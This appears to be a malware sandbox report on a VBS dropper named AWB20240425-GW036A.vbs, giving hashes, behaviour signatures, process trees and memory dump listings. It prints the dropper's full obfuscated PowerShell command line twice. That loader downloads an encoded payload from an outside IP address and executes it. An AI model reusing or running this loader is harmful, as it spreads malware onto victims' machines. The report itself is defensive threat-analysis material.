101709ca246d0ef5a9dad2f4fcaadc6325f122563636e340ebe692f5c3c7f371

Analysis

max time kernel
372s
max time network
1577s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
25-04-2024 14:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AWB20240425-GW036A.vbs
Size

15KB
MD5

851a938de8e948fdc84f7c247e868307
SHA1

20608ab0ed33379c6aa8c122d7abd6395c773919
SHA256

e03a97e8a866aaacc25682c3b75ec079e33a7f86bbb1e996696e91466de2a317
SHA512

0b7f4309c7e52ce7b341d754574a33f307ae92ed2134851049d87d005e6711f64aa42c343643db2fe4030a536506db6a436873de21ea45f9b3b53291e9ac7988
SSDEEP

384:4k+zpvxiGkmL8tdmUQOoAHCBMFgZvBGZKqWjRe3ie1t:4keMJc8tPh0eK5lSz

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 3204 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1996 1144 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

3204 powershell.exe
3204 powershell.exe
3204 powershell.exe
1144 powershell.exe
1144 powershell.exe
1144 powershell.exe
1144 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3204 powershell.exe
Token: SeDebugPrivilege 1144 powershell.exe

flow	pid	process
1	3204	powershell.exe

pid	pid_target	process	target process
1996	1144	WerFault.exe	powershell.exe

pid	process
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1980 wrote to memory of 3204	1980	WScript.exe	powershell.exe
PID 1980 wrote to memory of 3204	1980	WScript.exe	powershell.exe
PID 3204 wrote to memory of 4460	3204	powershell.exe	cmd.exe
PID 3204 wrote to memory of 4460	3204	powershell.exe	cmd.exe
PID 3204 wrote to memory of 1144	3204	powershell.exe	powershell.exe
PID 3204 wrote to memory of 1144	3204	powershell.exe	powershell.exe
PID 3204 wrote to memory of 1144	3204	powershell.exe	powershell.exe
PID 1144 wrote to memory of 2520	1144	powershell.exe	cmd.exe
PID 1144 wrote to memory of 2520	1144	powershell.exe	cmd.exe
PID 1144 wrote to memory of 2520	1144	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AWB20240425-GW036A.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forstder = 1;$Epigrammatised='Substrin';$Epigrammatised+='g';Function Induktioners($Pechans65){$Foujdary=$Pechans65.Length-$Forstder;For($Ekviperinger132=6; $Ekviperinger132 -lt $Foujdary; $Ekviperinger132+=(7)){$Laborbxr189+=$Pechans65.$Epigrammatised.Invoke($Ekviperinger132, $Forstder);}$Laborbxr189;}function Kreditsiden($Ergoterapeutiske){& ($Pangane75) ($Ergoterapeutiske);}$Chenillers=Induktioners 'UnretiM incaro No.aszReexpeiTrickslOpvoksl Hurt,aF agme/Sjleka5Navnel. ynoph0Sprogf unramm(SkortoWKl.nteiF.rbilnIllumidTet,amoAar.fewBrachysR,coin LettucNIndv,aTToer.e ,etspr1 Casel0Massem.comp,i0 Pol.p; To re Skik eW SutteikammennDe.ent6 Bribe4Staast;Guldhe ClarixS,urop6Outtro4Film n;Fretta TonsilrWittolvEfterg:Konfir1Redakt2Cognac1Afstra.Joinde0 Cellu)Rooved HavariGEuphoreStatsacCinemakDanutao rean/Kulmin2Extemp0mod,tn1lystig0Ineff.0 Intra1Invac.0 mongo1Cet.ne AbbotFUbefr i Termir SchizeRealitfre.oleoIdentixHassoc/Undsag1contai2limous1Baldri. Perso0Dessin ';$Bevilliget=Induktioners 'OmveksU Fr.desDan.ereRengjor.astro- O.hilAProramgUnt,uteEmb.zznBejaentDaarli ';$inddelings=Induktioners 'KlimathSparrotExtravtSpgesupLightn:Demine/Ufuldk/ Indhf8K.mmys7Blomst.neolit1.hygge2 Perez1Furcil. Depoh1Ladend0Af ikl5Lianes. Rive.1Sassan8Neence4Ubru,e/ acroP S rkblGyroc iejefaloProlettmonotor Skulpo tolernSpinal.BimboesRi,ingn RingdpA.rakn ';$Reclipsens=Induktioners 'Inte n>Fungo. ';$Pangane75=Induktioners 'U.shipiV ldtjeUdeblixmouldi ';$Unenergetic='Jrdis45';Kreditsiden (Induktioners ' CephaSNondiseFrerhutAccept-TillgsCVinge,oMothernRoperitVanddaeA.kohon Cucumt Rejse Vindue- PostePUnsigna SynsrtFrede hSam,rb Stam,aTGrineb:Unsubs\HeartyPAandlshGrott.aDokumelSensa.aWrasser SkoleoarbejdpSmarthoSlu.gedPantebiBlockhdNonconaScreeneKlipp..KonfigtLi.terxEnginot.emedi Fettle-middayVdat,sya ChefslCulletuSem fleSpndes Landst$ DahliUU.videnPaeanieGaasevn ArbejeCussesrStainfgThiocaeHoejadtDobbeliDovnercSkudsm; Un.es ');Kreditsiden (Induktioners 'Aqu.caiWantonf notec Inexpr(NonunctretlineTotalisLecanotAmides- Mck.npHenhreaBagsidtK,gemahLatt.r S.undnTTrohj.:Pulser\KoloniPMasc.lhL,renzaPeridilA.tiaraS rittr Eq icoMe.esapmle,esoCountedLaudabisamar,dAcroteaAr.ense Udvi ..erchlt .fterxLejligt rund)Talesp{Titelke TipbuxUkorreiBabaylt So.da}Humani;Interf ');$Unviolined = Induktioners ' Unp.oe PentacLithoehMopishoProwes ureter% Ch nda s perpLagerlpDriftsd Va uea,imenst Spacea Besti%Maxkar\ ma thS Amphit PoisaiKontoulMaysiniHolectsM ngestHoussmiBiolumsVrdighkVindmle Nona sDug al.CymlinSMorterh,rontae Redde B.stte&Dobbel& Preci Dagd,ieBronkocMaltenhUniveroGravre Bushw$Klangs ';Kreditsiden (Induktioners 'Speakh$ IndsngMirakllBic.looHusligbHendbeaLderetl Heter:HydroxWOperaniChemo tMed.arh Un.ase ProklrRent beRysterd TransnUdskr.e.ydromsPljejosS,ndik= orst( Mort.cskulpemUnknowdWorryi folkek/Asylsgc S att porses$Skins,U UndvinGodskrvDelfuni PayoroCupfullRemicli HjemmnTarmkaeint rmd Overm)Vsele ');Kreditsiden (Induktioners 'Fagstu$MngdengRe ninl BrisaoDidracbSk,ermaStenotlsans r:UdlgstDR,compaMer admcutlete raquebSun.helKaretea SnftmdIrksfee L ebgspipec.9gglesp4Sal ic= E per$Pil.emiSpeakenSammendLednindTandsteAntagolOmstbeiPortrtnconflugAfvbnes likf.l,thotsShrivepAnchusl.yggekiSupervtSi etr(Divini$SkeledRAgerdyeParliacVers,olStreckiLeve ipKeybutsTi,slreBazoo nSelvsksTranss) Lyopo ');$inddelings=$Dameblades94[0];Kreditsiden (Induktioners ' Muckr$ mirelg.resopl L,ereoSqui,eb Po seaUnmaillPeriku: TrichHO,ientaMisenul AfkrfvKundenfIcyafstSpringtOxy,yaeDelicarghoulie risernBackarsMouthy=IsocytNAarstieA lnafwSkyesd- He.veOTombakbUnderpjUncommeex rbscKonsultegoers vedlagSH ekylyLaanebsNavngitPurebleTu,binm uning. ,tomeNE.adiaeBik,getTredve.JyllanWOv.rpreFyresebSandmeCD,lnoelAn epei OffseeA.teron ManuatMalisk ');Kreditsiden (Induktioners 'Chowde$HjsindHRap,elaBibelsl Levievf,rstefstedsat Prok.tEtudeneTjenesr.oranseAktieanSva essDodded. DifteH .ecereCaus,laDipperdNece.se,orgelr S.gnis Lorch[Bladko$FletkoBOutvoieQu.ntivMelainiFeltt.l RhabdlRespeciDimissg LateneLethartDds.eg]Al.let=Tumata$IndholCUg ianhSchoolebeckyfnSign.tiFerierl multilCalycleHoubarrP.aksisRadius ');$returbilletter=Induktioners 'LoadimHLugninaCadmiel EjendvSkjortf,tandatElutortDetacheGodhearSkagenePe thonSkohorsMisman. refecDPesti o,mtsskwFa,amonGu fdrlAlde.soSundowaPasiladMoraliF Roe mikram,olGordyae,ugabo(Heirsf$R shvei CustonHyt.efdCong ldCamorreAchanglKontroiBabcocn Wifelg VarnisMaleri,Radonm$O.iginpComp lr KirgiePennatvTun,selPreceslL.steniOvertrnStudehgAroideeDaleren .akul)Settle ';$returbilletter=$Witheredness[1]+$returbilletter;$prevllingen=$Witheredness[0];Kreditsiden (Induktioners 'Homosp$ VolpagIl,kuglDand soRotatobPutt,haHidserl Skade: mbygP Recipa Dollir RevanssygeekoAm.sranPick,esIdoleriIst mtaUdvide=Vassa.(Flik,lTfo.tykeflykaps ReevotMiddle-Tor,isPAdherea OctectPneu ahosteo. Me de$Submarp L.gerrAbococe FugacvR.jseblSolurelAfhndeiLejerenLidelsgPro.ene Imerinhiccou)Rektio ');while (!$Parsonsia) {Kreditsiden (Induktioners 'Repsbi$ D,enggQuintelPensiooKaravab KogekaEglandl Jurat:HvilenEdoublelInappoeFridilcDishertTou.hhrBilligoBodilidOu.mariHyper sAnsti,pEvilspe Yelvar .rnsesLau ifiUnsimuvAusc leSacram=Puddle$Rrfle.tIsometromstiluEstrageDkslas ') ;Kreditsiden $returbilletter;Kreditsiden (Induktioners 'VegeteS CuyaitResyncacaque,rEmotiotSeromu-TartarSSnapwolSemipeeMopboaeInter p Allee Totala4Monost ');Kreditsiden (Induktioners 'Synskr$RamequgParasilSti.stoRunch.bHymenaaSubtralPittud:DaginsPVariegaDesperrOparbes.apetbo ndrmmnSisalesSuperiientotiaI cola=Serag,(eftersT Borize Bu,imssmrtyvtSt vef-T.nistPIngeniaUltrattC.nonchViljes korsar$Une.ympAbonnerLizz.ieNationv skivelTricollreinhoiStrackn arvengRea,lne Nondendis er)P,ctur ') ;Kreditsiden (Induktioners 'Blindt$CartelgHvil.llFormuloUdomo.bSpatioaDetaillU.diss:.entilRWellhoe D ivgi alesbf adjutiTrawlnkSkibbraSemi.btAi retiTyfus oDuettenGuldfu=Gradsf$DragkigK istel DecomoBeslaabTransfaMuliebl Apop : Tam,lFLigat,aMak.otbHolozor ,etanibro ink onomisOvervam Catalr ,irurkRetslgeGro,gytoutcavs .igna+Ophtha+tandem%Pseudo$ vi.dmDPlaidea Endnom Persoe FootgbBrutt lAbusaba L,erld robae U.parsPyrami9encyrt4.ontou.Mili ucTorpedoMosk suOverlinHarmo.tkaktus ') ;$inddelings=$Dameblades94[$Reifikation];}Kreditsiden (Induktioners 'Skylle$Altruig ,olaplSkaaneoRullesbUd seuaMokke,lOpbrin:DiskofFSherifeTuppenrSortlisStdesekBltedkvbasta.aReobtarsocialeArvemat VandueFilletrJournamUnusagi.annetnPartilaYouth l BadevsRevers Molehe=Afglat f,avalGmot,rie Si,ketjulebu- MonovCPrecomoVilopsn DanertAntivee.acrotnUnarmetPaamin Unmedi$SporidpRec rkrIndoeueAfrettvCatechlSpro.nl fa,ebiGorto,n ParatgAgramee UneasnAntice ');Kreditsiden (Induktioners 'Forsrg$ D,rmagPseud,lEditoroBis.arb Wh,nia.ulfonlPashal:NummerFIndprel ReappaTr.ndscNat,evkT.yrsieWolfrarBordel Fonern=Underf Valuta[ReintrS SamgiyLegitisFagpolt ychoe FremsmCitere.ConsumCArtsfooUndergnUdkra,vTypegoePrivatr l,strt Pr.fe]Tha.ll:Tertia:A.kilsFQuasi,rOversto nocksmAn lopBDeglacaOver,psIndustepiuink6God,kr4SlappeS ScanptOpspo.rstorkoiKari,an IntragLogere(ballst$ olkekFSkuespe LysflrAa devs Grif,kElderlvAfbilla Blaa rCirkuseca chetG sjfteVernorrSkovb.mSp jlgi oszanSubrutaCocae.l Amp rs dsvve)Unmast ');Kreditsiden (Induktioners ' Ubast$K.ordig Kerubl AutodosammenbHoffe,a iacholAxi te:An.ropU Trr.rn U.pnshRetsinu Farvem Dr psiB.ndesdE.kort Leksik= Mylo, S,nes[PalmetS StendyEmploysBagsdetOverstebagatemMedar,.monterT Unceretrv.grxFon.antIndf n. AutobEinvalonBumpkicPericloPromatdHjlpeoiEr,vernVold lgtetrad]Deco.l:Ser zy: DesigATrykstSApplauCHeroisIFjerteIvarmel.Pyra,rGDatafieVrdifotMachisSPapfabtUberetrFirma,isc,locn Strafg Ryatp( small$BindslFAnastolRacerna FiretcBo.nerkBager.eVilifirLedn n).ameks ');Kreditsiden (Induktioners 'Papi k$Circu,gNiccoplK ightoDomorgbChosetaBarsell Feliz: pileFGerocoi.oodcrnMumpsifSciagroCi,cumoLillest Ringfspre,xh=Intuit$ T ffeUAcri onRrbladh KochbuTumbesmSkibshiBambusdBru kb.CosiedsC.nesku Fu.rubPyr.lisAthlettElaphirInund iSto.svnPhosgegUddata( Rat o3 Adres4Plantr0Afsnit9Unperm5Medusa5Drafts,,antho2Suspen9 fagot4Afsoeg1Elaeo 1Brainc)Whaleh ');Kreditsiden $Finfoots;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3204

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stilistiskes.She && echo $"
3⤵
PID:4460

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forstder = 1;$Epigrammatised='Substrin';$Epigrammatised+='g';Function Induktioners($Pechans65){$Foujdary=$Pechans65.Length-$Forstder;For($Ekviperinger132=6; $Ekviperinger132 -lt $Foujdary; $Ekviperinger132+=(7)){$Laborbxr189+=$Pechans65.$Epigrammatised.Invoke($Ekviperinger132, $Forstder);}$Laborbxr189;}function Kreditsiden($Ergoterapeutiske){& ($Pangane75) ($Ergoterapeutiske);}$Chenillers=Induktioners 'UnretiM incaro No.aszReexpeiTrickslOpvoksl Hurt,aF agme/Sjleka5Navnel. ynoph0Sprogf unramm(SkortoWKl.nteiF.rbilnIllumidTet,amoAar.fewBrachysR,coin LettucNIndv,aTToer.e ,etspr1 Casel0Massem.comp,i0 Pol.p; To re Skik eW SutteikammennDe.ent6 Bribe4Staast;Guldhe ClarixS,urop6Outtro4Film n;Fretta TonsilrWittolvEfterg:Konfir1Redakt2Cognac1Afstra.Joinde0 Cellu)Rooved HavariGEuphoreStatsacCinemakDanutao rean/Kulmin2Extemp0mod,tn1lystig0Ineff.0 Intra1Invac.0 mongo1Cet.ne AbbotFUbefr i Termir SchizeRealitfre.oleoIdentixHassoc/Undsag1contai2limous1Baldri. Perso0Dessin ';$Bevilliget=Induktioners 'OmveksU Fr.desDan.ereRengjor.astro- O.hilAProramgUnt,uteEmb.zznBejaentDaarli ';$inddelings=Induktioners 'KlimathSparrotExtravtSpgesupLightn:Demine/Ufuldk/ Indhf8K.mmys7Blomst.neolit1.hygge2 Perez1Furcil. Depoh1Ladend0Af ikl5Lianes. Rive.1Sassan8Neence4Ubru,e/ acroP S rkblGyroc iejefaloProlettmonotor Skulpo tolernSpinal.BimboesRi,ingn RingdpA.rakn ';$Reclipsens=Induktioners 'Inte n>Fungo. ';$Pangane75=Induktioners 'U.shipiV ldtjeUdeblixmouldi ';$Unenergetic='Jrdis45';Kreditsiden (Induktioners ' CephaSNondiseFrerhutAccept-TillgsCVinge,oMothernRoperitVanddaeA.kohon Cucumt Rejse Vindue- PostePUnsigna SynsrtFrede hSam,rb Stam,aTGrineb:Unsubs\HeartyPAandlshGrott.aDokumelSensa.aWrasser SkoleoarbejdpSmarthoSlu.gedPantebiBlockhdNonconaScreeneKlipp..KonfigtLi.terxEnginot.emedi Fettle-middayVdat,sya ChefslCulletuSem fleSpndes Landst$ DahliUU.videnPaeanieGaasevn ArbejeCussesrStainfgThiocaeHoejadtDobbeliDovnercSkudsm; Un.es ');Kreditsiden (Induktioners 'Aqu.caiWantonf notec Inexpr(NonunctretlineTotalisLecanotAmides- Mck.npHenhreaBagsidtK,gemahLatt.r S.undnTTrohj.:Pulser\KoloniPMasc.lhL,renzaPeridilA.tiaraS rittr Eq icoMe.esapmle,esoCountedLaudabisamar,dAcroteaAr.ense Udvi ..erchlt .fterxLejligt rund)Talesp{Titelke TipbuxUkorreiBabaylt So.da}Humani;Interf ');$Unviolined = Induktioners ' Unp.oe PentacLithoehMopishoProwes ureter% Ch nda s perpLagerlpDriftsd Va uea,imenst Spacea Besti%Maxkar\ ma thS Amphit PoisaiKontoulMaysiniHolectsM ngestHoussmiBiolumsVrdighkVindmle Nona sDug al.CymlinSMorterh,rontae Redde B.stte&Dobbel& Preci Dagd,ieBronkocMaltenhUniveroGravre Bushw$Klangs ';Kreditsiden (Induktioners 'Speakh$ IndsngMirakllBic.looHusligbHendbeaLderetl Heter:HydroxWOperaniChemo tMed.arh Un.ase ProklrRent beRysterd TransnUdskr.e.ydromsPljejosS,ndik= orst( Mort.cskulpemUnknowdWorryi folkek/Asylsgc S att porses$Skins,U UndvinGodskrvDelfuni PayoroCupfullRemicli HjemmnTarmkaeint rmd Overm)Vsele ');Kreditsiden (Induktioners 'Fagstu$MngdengRe ninl BrisaoDidracbSk,ermaStenotlsans r:UdlgstDR,compaMer admcutlete raquebSun.helKaretea SnftmdIrksfee L ebgspipec.9gglesp4Sal ic= E per$Pil.emiSpeakenSammendLednindTandsteAntagolOmstbeiPortrtnconflugAfvbnes likf.l,thotsShrivepAnchusl.yggekiSupervtSi etr(Divini$SkeledRAgerdyeParliacVers,olStreckiLeve ipKeybutsTi,slreBazoo nSelvsksTranss) Lyopo ');$inddelings=$Dameblades94[0];Kreditsiden (Induktioners ' Muckr$ mirelg.resopl L,ereoSqui,eb Po seaUnmaillPeriku: TrichHO,ientaMisenul AfkrfvKundenfIcyafstSpringtOxy,yaeDelicarghoulie risernBackarsMouthy=IsocytNAarstieA lnafwSkyesd- He.veOTombakbUnderpjUncommeex rbscKonsultegoers vedlagSH ekylyLaanebsNavngitPurebleTu,binm uning. ,tomeNE.adiaeBik,getTredve.JyllanWOv.rpreFyresebSandmeCD,lnoelAn epei OffseeA.teron ManuatMalisk ');Kreditsiden (Induktioners 'Chowde$HjsindHRap,elaBibelsl Levievf,rstefstedsat Prok.tEtudeneTjenesr.oranseAktieanSva essDodded. DifteH .ecereCaus,laDipperdNece.se,orgelr S.gnis Lorch[Bladko$FletkoBOutvoieQu.ntivMelainiFeltt.l RhabdlRespeciDimissg LateneLethartDds.eg]Al.let=Tumata$IndholCUg ianhSchoolebeckyfnSign.tiFerierl multilCalycleHoubarrP.aksisRadius ');$returbilletter=Induktioners 'LoadimHLugninaCadmiel EjendvSkjortf,tandatElutortDetacheGodhearSkagenePe thonSkohorsMisman. refecDPesti o,mtsskwFa,amonGu fdrlAlde.soSundowaPasiladMoraliF Roe mikram,olGordyae,ugabo(Heirsf$R shvei CustonHyt.efdCong ldCamorreAchanglKontroiBabcocn Wifelg VarnisMaleri,Radonm$O.iginpComp lr KirgiePennatvTun,selPreceslL.steniOvertrnStudehgAroideeDaleren .akul)Settle ';$returbilletter=$Witheredness[1]+$returbilletter;$prevllingen=$Witheredness[0];Kreditsiden (Induktioners 'Homosp$ VolpagIl,kuglDand soRotatobPutt,haHidserl Skade: mbygP Recipa Dollir RevanssygeekoAm.sranPick,esIdoleriIst mtaUdvide=Vassa.(Flik,lTfo.tykeflykaps ReevotMiddle-Tor,isPAdherea OctectPneu ahosteo. Me de$Submarp L.gerrAbococe FugacvR.jseblSolurelAfhndeiLejerenLidelsgPro.ene Imerinhiccou)Rektio ');while (!$Parsonsia) {Kreditsiden (Induktioners 'Repsbi$ D,enggQuintelPensiooKaravab KogekaEglandl Jurat:HvilenEdoublelInappoeFridilcDishertTou.hhrBilligoBodilidOu.mariHyper sAnsti,pEvilspe Yelvar .rnsesLau ifiUnsimuvAusc leSacram=Puddle$Rrfle.tIsometromstiluEstrageDkslas ') ;Kreditsiden $returbilletter;Kreditsiden (Induktioners 'VegeteS CuyaitResyncacaque,rEmotiotSeromu-TartarSSnapwolSemipeeMopboaeInter p Allee Totala4Monost ');Kreditsiden (Induktioners 'Synskr$RamequgParasilSti.stoRunch.bHymenaaSubtralPittud:DaginsPVariegaDesperrOparbes.apetbo ndrmmnSisalesSuperiientotiaI cola=Serag,(eftersT Borize Bu,imssmrtyvtSt vef-T.nistPIngeniaUltrattC.nonchViljes korsar$Une.ympAbonnerLizz.ieNationv skivelTricollreinhoiStrackn arvengRea,lne Nondendis er)P,ctur ') ;Kreditsiden (Induktioners 'Blindt$CartelgHvil.llFormuloUdomo.bSpatioaDetaillU.diss:.entilRWellhoe D ivgi alesbf adjutiTrawlnkSkibbraSemi.btAi retiTyfus oDuettenGuldfu=Gradsf$DragkigK istel DecomoBeslaabTransfaMuliebl Apop : Tam,lFLigat,aMak.otbHolozor ,etanibro ink onomisOvervam Catalr ,irurkRetslgeGro,gytoutcavs .igna+Ophtha+tandem%Pseudo$ vi.dmDPlaidea Endnom Persoe FootgbBrutt lAbusaba L,erld robae U.parsPyrami9encyrt4.ontou.Mili ucTorpedoMosk suOverlinHarmo.tkaktus ') ;$inddelings=$Dameblades94[$Reifikation];}Kreditsiden (Induktioners 'Skylle$Altruig ,olaplSkaaneoRullesbUd seuaMokke,lOpbrin:DiskofFSherifeTuppenrSortlisStdesekBltedkvbasta.aReobtarsocialeArvemat VandueFilletrJournamUnusagi.annetnPartilaYouth l BadevsRevers Molehe=Afglat f,avalGmot,rie Si,ketjulebu- MonovCPrecomoVilopsn DanertAntivee.acrotnUnarmetPaamin Unmedi$SporidpRec rkrIndoeueAfrettvCatechlSpro.nl fa,ebiGorto,n ParatgAgramee UneasnAntice ');Kreditsiden (Induktioners 'Forsrg$ D,rmagPseud,lEditoroBis.arb Wh,nia.ulfonlPashal:NummerFIndprel ReappaTr.ndscNat,evkT.yrsieWolfrarBordel Fonern=Underf Valuta[ReintrS SamgiyLegitisFagpolt ychoe FremsmCitere.ConsumCArtsfooUndergnUdkra,vTypegoePrivatr l,strt Pr.fe]Tha.ll:Tertia:A.kilsFQuasi,rOversto nocksmAn lopBDeglacaOver,psIndustepiuink6God,kr4SlappeS ScanptOpspo.rstorkoiKari,an IntragLogere(ballst$ olkekFSkuespe LysflrAa devs Grif,kElderlvAfbilla Blaa rCirkuseca chetG sjfteVernorrSkovb.mSp jlgi oszanSubrutaCocae.l Amp rs dsvve)Unmast ');Kreditsiden (Induktioners ' Ubast$K.ordig Kerubl AutodosammenbHoffe,a iacholAxi te:An.ropU Trr.rn U.pnshRetsinu Farvem Dr psiB.ndesdE.kort Leksik= Mylo, S,nes[PalmetS StendyEmploysBagsdetOverstebagatemMedar,.monterT Unceretrv.grxFon.antIndf n. AutobEinvalonBumpkicPericloPromatdHjlpeoiEr,vernVold lgtetrad]Deco.l:Ser zy: DesigATrykstSApplauCHeroisIFjerteIvarmel.Pyra,rGDatafieVrdifotMachisSPapfabtUberetrFirma,isc,locn Strafg Ryatp( small$BindslFAnastolRacerna FiretcBo.nerkBager.eVilifirLedn n).ameks ');Kreditsiden (Induktioners 'Papi k$Circu,gNiccoplK ightoDomorgbChosetaBarsell Feliz: pileFGerocoi.oodcrnMumpsifSciagroCi,cumoLillest Ringfspre,xh=Intuit$ T ffeUAcri onRrbladh KochbuTumbesmSkibshiBambusdBru kb.CosiedsC.nesku Fu.rubPyr.lisAthlettElaphirInund iSto.svnPhosgegUddata( Rat o3 Adres4Plantr0Afsnit9Unperm5Medusa5Drafts,,antho2Suspen9 fagot4Afsoeg1Elaeo 1Brainc)Whaleh ');Kreditsiden $Finfoots;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stilistiskes.She && echo $"
4⤵
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 2544
4⤵
- Program crash
PID:1996

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttdh5fnw.xad.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Stilistiskes.She
Filesize
482KB

MD5
4f20e4840a32dc400990d68b8904f369

SHA1
0219b41ec76336cb01246d2d8ce0926245f3051a

SHA256
5ce055ec4f39568ec128be6145590716d7edde9096d813342ea585e50cfe0c13

SHA512
1b441dff972e7333f55cdbf39875c38b998855b74f80c5ec355198906f949afa6e4761ae74d22bb122a0bfa268e38435e6ac48234c7005fb5ac83719d273c49f

Download Submit
memory/1144-67-0x0000000008000000-0x0000000008350000-memory.dmp

Filesize
3.3MB

Download
memory/1144-127-0x0000000004C70000-0x0000000004C80000-memory.dmp

Filesize
64KB

Download
memory/1144-68-0x0000000008470000-0x000000000848C000-memory.dmp

Filesize
112KB

Download
memory/1144-126-0x0000000073300000-0x00000000739EE000-memory.dmp

Filesize
6.9MB

Download
memory/1144-93-0x000000000A550000-0x000000000AA4E000-memory.dmp

Filesize
5.0MB

Download
memory/1144-92-0x0000000009880000-0x00000000098A2000-memory.dmp

Filesize
136KB

Download
memory/1144-60-0x0000000073300000-0x00000000739EE000-memory.dmp

Filesize
6.9MB

Download
memory/1144-59-0x0000000004C80000-0x0000000004CB6000-memory.dmp

Filesize
216KB

Download
memory/1144-61-0x0000000004C70000-0x0000000004C80000-memory.dmp

Filesize
64KB

Download
memory/1144-62-0x0000000004C70000-0x0000000004C80000-memory.dmp

Filesize
64KB

Download
memory/1144-63-0x00000000076A0000-0x0000000007CC8000-memory.dmp

Filesize
6.2MB

Download
memory/1144-64-0x0000000007D00000-0x0000000007D22000-memory.dmp

Filesize
136KB

Download
memory/1144-65-0x0000000007DA0000-0x0000000007E06000-memory.dmp

Filesize
408KB

Download
memory/1144-66-0x0000000007F80000-0x0000000007FE6000-memory.dmp

Filesize
408KB

Download
memory/1144-91-0x00000000098F0000-0x0000000009984000-memory.dmp

Filesize
592KB

Download
memory/1144-69-0x00000000089D0000-0x0000000008A1B000-memory.dmp

Filesize
300KB

Download
memory/1144-86-0x00000000095F0000-0x000000000960A000-memory.dmp

Filesize
104KB

Download
memory/1144-70-0x00000000086D0000-0x0000000008746000-memory.dmp

Filesize
472KB

Download
memory/1144-85-0x0000000009ED0000-0x000000000A548000-memory.dmp

Filesize
6.5MB

Download
memory/3204-7-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-10-0x00000209301F0000-0x0000020930266000-memory.dmp

Filesize
472KB

Download
memory/3204-42-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-41-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-108-0x00007FFFCD880000-0x00007FFFCE26C000-memory.dmp

Filesize
9.9MB

Download
memory/3204-5-0x00007FFFCD880000-0x00007FFFCE26C000-memory.dmp

Filesize
9.9MB

Download
memory/3204-120-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-123-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-124-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-125-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-9-0x0000020917990000-0x00000209179A0000-memory.dmp

Filesize
64KB

Download
memory/3204-4-0x000002092FEE0000-0x000002092FF02000-memory.dmp

Filesize
136KB

Download